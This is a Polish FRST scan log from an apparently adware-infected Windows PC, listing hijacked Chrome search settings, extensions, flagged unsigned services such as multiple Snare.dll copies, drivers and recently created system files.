StartMenuInternet: FIREFOX.EXE - firefox.exe Chrome: ======= CHR DefaultProfile: Default CHR HomePage: Default -> hxxps://mysearch.avg.com/?rvt=1 CHR StartupUrls: Default -> "hxxp://www.mylucky123.com/?type=hp&ts=1476278975&z=71bc37aca8b1af6f906a67cgdz2m4q6o6m5b9t1mfc&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553" CHR DefaultSearchURL: Default -> hxxp://www.istartsurf.com/web/?type=ds&ts=1448273034&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=cor&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} CHR DefaultSearchKeyword: Default -> istartsurf CHR Profile: C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default [2017-05-12] CHR Extension: (Dokumenty Google) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-14] CHR Extension: (Dysk Google) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21] CHR Extension: (YouTube) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25] CHR Extension: (Google Search) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-30] CHR Extension: (AVG SafePrice) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2016-12-28] CHR Extension: (Ace Stream Web Extension) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjbepbhonbojpoaenhckjocchgfiaofo [2016-12-28] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-31] CHR Extension: (Gmail) - C:\Users\Cepek\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28] CHR HKLM\...\Chrome\Extension: [fagakgcelolinfnkfgekcnedpaklfcok] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1368180626-1709571630-246340318-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1368180626-1709571630-246340318-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08] CHR HKLM-x32\...\Chrome\Extension: [fagakgcelolinfnkfgekcnedpaklfcok] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx StartMenuInternet: Google Chrome - Chrome.exe HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) <==== UWAGA Opera: ======= OPR Extension: (Unlimited Free VPN - Hola) - C:\Users\Cepek\AppData\Roaming\Opera Software\Opera Stable\Extensions\ekmmelpnmfdegjhnmadddcfjcahpajnm [2017-06-06] ==================== Usługi (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA S2 CSHMDR; C:\Users\Cepek\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 CWASRE; C:\Users\Cepek\AppData\Local\CWASRE\Snare.dll [830464 2017-05-16] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 Diskeeper; C:\Program Files\Condusiv Technologies\Diskeeper\DkService.exe [2721656 2012-07-27] (Condusiv Technologies) R2 ETDService; C:\Program Files\Elantech\ETDService.exe [144096 2016-09-18] (ELAN Microelectronics Corp.) R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [95744 2017-05-31] () [Brak podpisu cyfrowego] <==== UWAGA R2 hola_svc; C:\Program Files\Hola\app\hola_svc.exe [5622368 2017-02-22] (Hola Networks Ltd.) <==== UWAGA R2 hola_updater; C:\Program Files\Hola\app\hola_updater.exe [5618864 2016-08-31] (Hola Networks Ltd.) [Brak podpisu cyfrowego] <==== UWAGA R2 Huawei E3272; C:\ProgramData\MobileBrServ\mbbservice.exe [240720 2013-12-03] () R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [330136 2015-08-27] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-07] (Intel Corporation) S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes) R2 Micro Star SCM; C:\Program Files (x86)\S-Bar\MSIService.exe [160768 2012-12-03] (Micro-Star International Co., Ltd.) [Brak podpisu cyfrowego] R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe [110384 2017-02-14] (Panda Security, S.L.) R2 NPASRE; C:\Users\Cepek\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation) S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [464440 2017-03-17] (NVIDIA Corporation) R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [450168 2017-05-03] (NVIDIA Corporation) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2157456 2017-06-01] (Electronic Arts) R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3127192 2017-06-01] (Electronic Arts) R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [86104 2016-07-19] (Panda Security, S.L.) R2 panda_url_filtering; C:\Program Files\Panda Security URL Filtering\Panda_URL_Filteringb.exe [246256 2016-11-22] (Visicom Media Inc.) R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1254736 2017-04-11] (Bitdefender) R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe [48584 2017-02-22] (Panda Security, S.L.) S2 snare; C:\Users\Cepek\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 SNAREA; C:\Users\Cepek\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Brak podpisu cyfrowego] S2 terana; C:\Users\Cepek\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 WANARE; C:\Users\Cepek\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347320 2017-04-28] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-04-28] (Microsoft Corporation) R2 WinSAPSvc; C:\Users\Cepek\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [Brak podpisu cyfrowego] <==== UWAGA S2 3DM; C:\Users\Cepek\AppData\Local\3DM\Kitty.dll [X] <==== UWAGA ===================== Sterowniki (filtrowane) ====================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R3 bbcap; C:\WINDOWS\system32\DRIVERS\bbcap.sys [4608 2014-03-23] (Windows (R) Codename Longhorn DDK provider) R0 DKDFM; C:\WINDOWS\System32\drivers\DKDFM.sys [40752 2012-04-05] (Condusiv Technologies) R3 DKRtWrt; C:\WINDOWS\System32\DRIVERS\DKRtWrt.sys [52048 2012-06-18] (Condusiv Technologies) R0 DKTLFSMF; C:\WINDOWS\System32\drivers\DKTLFSMF.sys [106832 2012-07-09] (Condusiv Technologies) R1 dtsoftbus01; C:\WINDOWS\System32\drivers\dtsoftbus01.sys [283064 2015-02-01] (Disc Soft Ltd) S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [17480 2013-03-07] () [Brak podpisu cyfrowego] S3 epmntdrv; C:\Windows\SysWOW64\epmntdrv.sys [13896 2013-03-07] () [Brak podpisu cyfrowego] R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [31832 2016-09-18] (ELAN Microelectronic Corp.) S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [9800 2013-03-07] () [Brak podpisu cyfrowego] S3 EuGdiDrv; C:\Windows\SysWOW64\EuGdiDrv.sys [9160 2013-03-07] () [Brak podpisu cyfrowego] R1 eusk2par; C:\Windows\system32\Drivers\eusk2par-amd64.sys [32336 2008-12-18] (Aladdin Knowledge Systems Ltd.) R1 MpKsl31b30e24; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{8315D861-77C4-4054-8089-61553A4FA78E}\MpKsl31b30e24.sys [44928 2017-06-16] (Microsoft Corporation) S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () R3 NETwNe64; C:\WINDOWS\System32\drivers\NETwew01.sys [3343872 2016-07-16] (Intel Corporation) R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [106928 2016-07-05] (Panda Security, S.L.) R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211376 2016-07-05] (Panda Security, S.L.) R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [119728 2016-07-05] (Panda Security, S.L.) R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [125872 2016-07-05] (Panda Security, S.L.) R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [80152 2016-07-06] (Panda Security, S.L.) R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [116656 2016-07-05] (Panda Security, S.L.) R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [90032 2016-07-05] (Panda Security, S.L.) R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [135088 2016-07-05] (Panda Security, S.L.) R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [335792 2016-07-05] (Panda Security, S.L.) R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [197040 2016-07-05] (Panda Security, S.L.) R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [123312 2016-07-05] (Panda Security, S.L.) R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [278960 2016-07-05] (Panda Security, S.L.) R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [125360 2016-07-05] (Panda Security, S.L.) R2 npf; C:\WINDOWS\System32\drivers\npf.sys [35344 2011-02-11] (CACE Technologies, Inc.) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_d555f104864d7e48\nvlddmkm.sys [14574640 2017-03-17] (NVIDIA Corporation) S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30328 2017-05-03] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48248 2017-05-03] (NVIDIA Corporation) R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57976 2017-05-03] (NVIDIA Corporation) R3 panda_url_filteringd; C:\Program Files\Panda Security URL Filtering\panda_url_filteringd.sys [51288 2014-03-19] (Visicom Media Inc.) R2 PSINAflt; C:\WINDOWS\system32\DRIVERS\PSINAflt.sys [177424 2017-02-12] (Panda Security, S.L.) R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [129296 2017-02-12] (Panda Security, S.L.) R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [205584 2017-02-20] (Panda Security, S.L.) R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [131344 2017-02-12] (Panda Security, S.L.) R2 PSINProt; C:\WINDOWS\system32\DRIVERS\PSINProt.sys [144656 2017-02-12] (Panda Security, S.L.) R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [114960 2017-02-12] (Panda Security, S.L.) R3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [72112 2016-08-09] (Panda Security, S.L.) S3 pwdrvio; C:\Windows\system32\pwdrvio.sys [19032 2013-07-01] () S3 pwdspio; C:\Windows\system32\pwdspio.sys [12384 2013-07-01] () R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek ) S3 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [23040 2016-07-16] (Microsoft Corporation) S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation) U3 idsvc; Brak ImagePath ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc - utworzone pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-06-16 16:00 - 2017-06-16 16:00 - 00000000 ____D C:\Users\Cepek\Desktop\FRST-OlderVersion 2017-06-15 16:17 - 2017-06-15 16:17 - 00000000 ____D C:\Users\Cepek\AppData\Local\UNP 2017-06-15 15:30 - 2017-06-15 15:30 - 00000000 ___SD C:\WINDOWS\UpdateAssistantV2 2017-06-15 14:46 - 2017-06-15 14:47 - 00000000 ____D C:\Program Files\UNP 2017-06-15 14:46 - 2017-06-15 14:46 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-06-15 14:33 - 2017-06-03 12:11 - 01706488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-06-15 14:33 - 2017-06-03 11:58 - 00340832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-06-15 14:33 - 2017-06-03 11:55 - 00780640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2017-06-15 14:33 - 2017-06-03 11:52 - 00607072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll 2017-06-15 14:33 - 2017-06-03 11:52 - 00111968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll 2017-06-15 14:33 - 2017-06-03 11:49 - 20967840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-06-15 14:33 - 2017-06-03 11:39 - 05686272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2017-06-15 14:33 - 2017-06-03 11:33 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-06-15 14:33 - 2017-06-03 11:31 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll 2017-06-15 14:33 - 2017-06-03 11:28 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll 2017-06-15 14:33 - 2017-06-03 11:26 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBrokerUI.dll 2017-06-15 14:33 - 2017-06-03 11:23 - 00306688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-06-15 14:33 - 2017-06-03 11:22 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll 2017-06-15 14:33 - 2017-06-03 11:22 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netcorehc.dll 2017-06-15 14:33 - 2017-06-03 11:22 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll 2017-06-15 14:33 - 2017-06-03 11:20 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2017-06-15 14:33 - 2017-06-03 11:19 - 01164288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe 2017-06-15 14:33 - 2017-06-03 11:16 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2017-06-15 14:33 - 2017-06-03 11:15 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-06-15 14:33 - 2017-06-03 11:12 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdProxy.dll 2017-06-15 14:33 - 2017-06-03 11:08 - 02643968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-06-15 14:33 - 2017-06-03 11:08 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll 2017-06-15 14:33 - 2017-06-03 11:06 - 03664384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-06-15 14:33 - 2017-06-03 11:05 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll 2017-06-15 14:33 - 2017-06-03 11:04 - 06042624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-06-15 14:33 - 2017-06-03 11:04 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe 2017-06-15 14:33 - 2017-06-03 11:03 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2017-06-15 14:33 - 2017-06-03 11:02 - 02997760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-06-15 14:33 - 2017-03-04 08:22 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2017-06-15 14:33 - 2017-03-04 08:19 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll 2017-06-15 14:33 - 2017-03-04 08:16 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll 2017-06-15 14:33 - 2016-09-07 06:53 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll 2017-06-15 14:32 - 2017-06-03 12:50 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-06-15 14:32 - 2017-06-03 12:50 - 00192856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll 2017-06-15 14:32 - 2017-06-03 12:06 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-06-15 14:32 - 2017-06-03 11:52 - 01021784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll 2017-06-15 14:32 - 2017-06-03 11:44 - 01412640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-06-15 14:32 - 2017-06-03 11:44 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-06-15 14:32 - 2017-06-03 11:32 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2017-06-15 14:32 - 2017-06-03 11:31 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-06-15 14:32 - 2017-06-03 11:28 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll 2017-06-15 14:32 - 2017-06-03 11:26 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll 2017-06-15 14:32 - 2017-06-03 11:15 - 19414016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-06-15 14:32 - 2017-06-03 11:15 - 18364928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-06-15 14:32 - 2017-06-03 11:08 - 12187648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-06-15 14:32 - 2017-06-03 11:05 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hnetcfg.dll 2017-06-15 14:32 - 2017-06-03 11:04 - 02006528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2017-06-15 14:32 - 2017-06-03 10:40 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-06-15 14:24 - 2017-06-03 11:50 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2017-06-15 14:24 - 2017-06-03 11:14 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-06-15 14:24 - 2017-06-03 11:14 - 00124416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-06-15 14:24 - 2017-06-03 11:14 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2017-06-15 14:24 - 2017-06-03 11:10 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll 2017-06-15 14:24 - 2017-06-03 11:08 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-06-15 14:24 - 2017-06-03 11:07 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-06-15 14:24 - 2017-06-03 10:52 - 03403264 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-06-15 14:24 - 2017-06-03 10:50 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2017-06-15 14:24 - 2017-06-03 10:49 - 03615744 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-06-15 14:24 - 2017-06-03 10:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2017-06-15 14:24 - 2017-06-03 10:49 - 02318848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-06-15 14:24 - 2017-06-03 10:49 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-06-15 14:24 - 2017-06-03 10:49 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe 2017-06-15 14:24 - 2017-06-03 10:48 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2017-06-15 14:23 - 2017-06-03 12:14 - 00136024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll 2017-06-15 14:23 - 2017-06-03 12:11 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys 2017-06-15 14:23 - 2017-06-03 12:09 - 02213760 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-06-15 14:23 - 2017-06-03 12:08 - 07783256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-06-15 14:23 - 2017-06-03 11:59 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys 2017-06-15 14:23 - 2017-06-03 11:59 - 00118112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys 2017-06-15 14:23 - 2017-06-03 11:53 - 00404824 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-06-15 14:23 - 2017-06-03 11:51 - 02187104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-06-15 14:23 - 2017-06-03 11:51 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2017-06-15 14:23 - 2017-06-03 11:49 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2017-06-15 14:23 - 2017-06-03 11:49 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2017-06-15 14:23 - 2017-06-03 11:48 - 00857952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll 2017-06-15 14:23 - 2017-06-03 11:48 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll 2017-06-15 14:23 - 2017-06-03 11:45 - 22220864 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-06-15 14:23 - 2017-06-03 11:44 - 01600624 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll 2017-06-15 14:23 - 2017-06-03 11:39 - 02532192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-06-15 14:23 - 2017-06-03 11:16 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-06-15 14:23 - 2017-06-03 11:15 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-06-15 14:23 - 2017-06-03 11:11 - 00353792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll 2017-06-15 14:23 - 2017-06-03 11:10 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBrokerUI.dll 2017-06-15 14:23 - 2017-06-03 11:09 - 00489472 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll 2017-06-15 14:23 - 2017-06-03 11:09 - 00441344 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcorehc.dll 2017-06-15 14:23 - 2017-06-03 11:09 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll 2017-06-15 14:23 - 2017-06-03 11:07 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll 2017-06-15 14:23 - 2017-06-03 11:03 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2017-06-15 14:23 - 2017-06-03 10:54 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll 2017-06-15 14:23 - 2017-06-03 10:53 - 08125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-06-15 14:23 - 2017-06-03 10:52 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2017-06-15 14:23 - 2017-06-03 10:51 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll 2017-06-15 14:23 - 2017-06-03 10:50 - 04744704 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-06-15 14:23 - 2017-06-03 10:48 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2017-06-15 14:23 - 2017-06-03 10:48 - 01131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2017-06-15 14:23 - 2017-06-03 10:48 - 00834048 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll 2017-06-15 14:23 - 2017-06-03 10:46 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-06-15 14:23 - 2017-05-25 07:56 - 00038752 _____ (Microsoft Corporation) C:\WINDOWS\system32\OOBEUpdater.exe 2017-06-15 14:23 - 2017-03-04 08:16 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll 2017-06-15 14:22 - 2017-06-03 12:14 - 01564512 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2017-06-15 14:22 - 2017-06-03 12:14 - 00629088 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2017-06-15 14:22 - 2017-06-03 12:14 - 00379232 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-06-15 14:22 - 2017-06-03 12:14 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll 2017-06-15 14:22 - 2017-06-03 12:14 - 00136032 _____ (Microsoft 